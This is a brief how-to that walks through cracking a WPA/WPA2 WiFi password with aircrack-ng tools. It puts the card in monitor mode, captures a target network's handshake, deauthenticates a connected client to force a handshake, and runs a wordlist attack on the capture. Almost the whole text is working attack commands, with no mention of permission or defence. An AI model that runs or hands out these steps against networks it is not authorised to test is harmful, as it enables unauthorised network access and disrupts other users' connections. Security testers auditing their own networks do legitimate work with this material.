WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:

1. Stop Network Manager: /etc/init.d/network-manager stop
2. Enter monitor mode: airmon-ng start wlan0
3. Find nearby networks: airodump-ng mon0
4. Identify the target BSSID and Channel number (-c option below)
5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
6. Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
7. Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
8. Apply brute force: aircrack-ng -w password.lst capturefile.cap
9. The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
10. Stop monitor mode: airmon-ng stop mon0